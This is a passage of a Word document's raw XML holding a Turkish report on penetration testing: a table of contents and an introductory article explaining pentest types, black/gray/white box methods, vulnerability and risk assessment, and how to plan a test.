          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SIZMA TESTİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Pentest Tanımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pentest Çeşitleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Pentest Yöntemleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00902FA9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(Zafiyet/Açıklık Tarama)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00902FA9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Neden sızma testi yaptırmalıyız?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00902FA9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Sızma testi projesinin planı nasıl olmalıdır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Maliyet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Testin İçerdiği Araçlar ve Teknikler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00902FA9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Test cihazına hangi bilgilerin verilmemesi gerekir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00902FA9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Pentest firması seçimi konusunda nelere dikkat etmeliyiz?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00902FA9">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Pentest yapan firmadan sonuç olarak neler beklemeliyiz?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Pentest sonrası nasıl bir yol izlemeliyiz?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Pentest konusunda kendimi geliştirmek için izlemem gereken yol haritası nasıl olmalıdır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Açık Kod Pentest Yazılımları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Ticari Pentest Yazılımları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL’İ ANLAMAK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL’in Özellikleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Teknik olarak bir SSL seltifikasının anlamı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL seltifikası neler sağlar?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL Neden gerekli?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL seltifikalarındaki ayrıntılar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL seltifikası tipleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SSL ENJEKSİYON SALDIRISI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tanıtım</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>İlgilendiren Sektör ve Şirketler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Bir Uygulama Güvenliği Problemi - "Yapısal Sorgulama Dili Kullanımı"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Örnek Saldırılar - "Yapılacak Hamleleri Önceden Tahmin Edebilmek..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Nasıl Korunmalı? - "Aksi Doğrulanıncaya Kadar Tüm Kullanıcı Girdileri Kötüdür..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00562188" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Son Söz - "Herzaman bir adım önde!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00562188">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">Sızma Testi Nedir? Penetrasyon testleri günümüz bilgi güvenliği dünyasının en popüler konularından biridir. BGA tarafından verilen güvenlik eğitimlerinde, sızma testi hakkında oldukça fazla soru ile karşılaşılmaktadır. Bu sorulara referans cevaplar olması adına “10 Soruda Sızma Testi” konulu yazıyı </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>hazırlamış bulunmaktayız. Pentest nedir? Neden yaptırmalıyım? Kime nasıl yaptırmalıyım? gibi sorulara cevap arıyoruz. Sizin de bu konu hakkında fikirleriniz varsa yorumlarınızla zenginleştirebilirsiniz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Öncelikle “pentest” kavramından ne anladığınızı ve ne beklediğinizi bilmek size bu süreçte yardımcı olacaktır. Zira ne olduğunu bilmediğiniz bir servisi alarak sonradan bu muydu yani? Bu kadar parayı bu iş için mi verdim ya da bu sistemlere neden baktırmadım gibi sorular sormak durumunda kalabilirsiniz. Yazı boyunca pentest, penetrasyon testi, sızma testi şeklinde farklı ifadeler kullanılmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>1- Sızma testi (Pentest) nedir? Vulnerability Assessment ve Risk Assesment kavramlarından farkı nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest Tanımı:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Belirlenen bilişim sistemlerindeki mantık hataları ve zafiyetleri tespit ederek, söz konusu güvenlik açıklıklarının kötü niyetli kişiler tarafından istismar edilmesini önlemek ve sistemleri daha güvenli hale getirmek maksadıyla, “yetkili” kişiler tarafından ve “yasal” olarak gerçekleştirilen güvenlik testleridir. Pentest çalışmalarındaki asıl amaç, zafiyeti tespit etmekten öte ilgili zafiyeti sisteme zarar vermeyecek şekilde istismar etmek ve yetkili erişimler elde etmektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest Çeşitleri:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest hedefe, vektöre, simüle edilecek saldırıya ve sisteme bağlı olarak üçe ayrılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>İç Ağ (Internal) Sızma Testi: Bu sızma testi çeşidinde ilgili kurumun içeriye açık sistemleri üzerinden hangi verilere ve/veya sistemlere erişilebileceği sorusuna cevap aranmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Dış Ağ (External) Sızma Testi: Bu sızma testi çeşidinde ilgili kurumun dışarıya açık sistemleri üzerinden hangi verilere ve/veya iç sistemlere erişilebileceği sorusuna cevap aranmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Web Uygulama Sızma Testi: Dış Ağ Sızma Testleri ile aynı soruya cevap aranmaktadır ancak odak noktamız web uygulamalarıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest Yöntemleri:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Temel olarak kabul görmüş üç yöntem vardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Black Box: Bu yaklaşımda, başlangıçta güvenlik testi yapılacak sistemle ilgili bir bilgi yoktur. Tamamen bilinmeyen bir sistem ile ilgili bilgi toplanacak ve testler yapılacaktır. Bu yöntemde test ekibinin sistem ile ilgili bilgi düzeyi hiç olmadığından, yanlışlıkla sisteme zarar verme ihtimalleri de yüksektir. Bilgi toplama safhası oldukça zaman alır. Süre bakımından en uzun süren yaklaşım tarzıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">Gray Box: Bu yaklaşımda, sistem ile ilgili bilgiler mevcuttur. Örneğin; IP adres listesi, sunucu sistem ile ilgili versiyon bilgisi vb. Bilgiler güvenlik testi yapacak ekibe önceden sağlanır. Black Box yaklaşımına </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>göre daha kısa zaman alır. Kontrolü ve testi istenen IP adresleri belli olduğundan sistemin, istem dışı zarar görme ihtimali de azalmış olur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>White Box: Beyaz kutu olarak ifade edilen bu yaklaşımda, güvenlik testi ekibi, sistemin kendisi ve arka planda çalışan ilave teknolojiler hakkında tam bilgi sahibidir. Black Box tekniğine göre kurum ve firmaya daha büyük fayda sağlar. Hata ve zafiyetleri bulmak kolaylaşacağından bunlara tedbir alınma süresi de azalacaktır. Sistemin zarar görme riski çok azdır ve maliyet olarak da en az maliyetli olandır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Vulnerability Assessment (Zafiyet/Açıklık Tarama):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Zafiyet taraması bir sistemdeki muhtemel tüm açıklıkların belirlenmesine yönelik tasarlanmış bir testtir. Bu yöntem için genellikle otomatize araçlar (Nessus, Nmap, Qualys vb) kullanılır. Zafiyet taramasında asıl amaç taranan sistemin anlık olarak genel güvenlik görüntüsünü almaktır. Muhtemel tüm güvenlik tehditlerine karşı bizi uyaran bu yöntem sonucu çıkan tüm bulgular ciddi bir tehdidi göstermeyebilir. Ancak bu da ciddiye alınmaması gerektiğini göstermez. Bizim için önemli olan çıkan bulgulardan hangilerinin sistemimiz için gerçek bir tehdit oluşturduğuna karar vermektir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bu yöntemde denetlenen diğer şey ise uyumluluk süreçleridir. Firmaların HIPAA, PCI, SOX vb. gibi dünyaca kabul edilmiş birçok uyumluluk standartlarına göre durumunu da inceler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Risk Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Risk Assessment  kavramı tamamen farklı bir kavram olup Pentest ve Vulnerability Assessment kavramlarını kapsar. Zaman zaman “Technical Risk Assessment” tanımı kullanılarak “Vulnerability Assessment” kavramı kastedilmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>2- Neden sızma testi yaptırmalıyız?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Sahip olduğunuz bilişim sistemlerindeki güvenlik zafiyetlerinin üçüncü bir göz tarafından kontrol edilmesi ve raporlanması proaktif güvenliğin ilk adımlarındandır. Çünkü siz ne kadar güvenliğe dikkat ederseniz edin saldırganların, sistemi istismar etmek için kullanacağı tekniklerin sınırı yoktur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Hayal gücü ve bilgi seviyelerine göre ihtimaller değişmektedir. Bir şeylerin gözünüzden kaçma ihtimali vardır. Bu sebeplerden dolayı hackerlara yem olmadan kendi güvenliğinizi Beyaz şapkalı hackerlara test ettirmeniz yararınıza olacaktır. Ek olarak PCI, HIPAA gibi standartlar da Pentest yaptırmayı zorunlu kılmaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>3- Sızma testi projesinin planı nasıl olmalıdır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Yaptırılacak sızma testi çalışmasından olabildiğince çok verim alabilmek için her işte olduğu gibi burada da plan yapılması gerekmektedir. Pentest planınızı en azından aşağıdaki soruları cevaplayarak hazırlamanız gerçekleştirilecek testten üst düzeyde verim almanızı sağlayacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Sızma Testi’nin kapsamı ne olacak? (White Box, Gray Box, Black Box)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ne çeşit bir sızma testi istiyorum? (Internal Pentest, External Pentest, Web Application Pentest)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Testleri kime yaptıracağım?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Ne kadar sıklıkla yaptıracağım?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Riskli sistem ve servisler kapsam dışı olmalı mı yoksa riski kabul edip sonucunu görmek ister miyim?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Pentest kapsamında DDOS testleri de gerçekleştirilecek mi?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>4- Pentest firması seçimi konusunda nelere dikkat etmeliyim?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
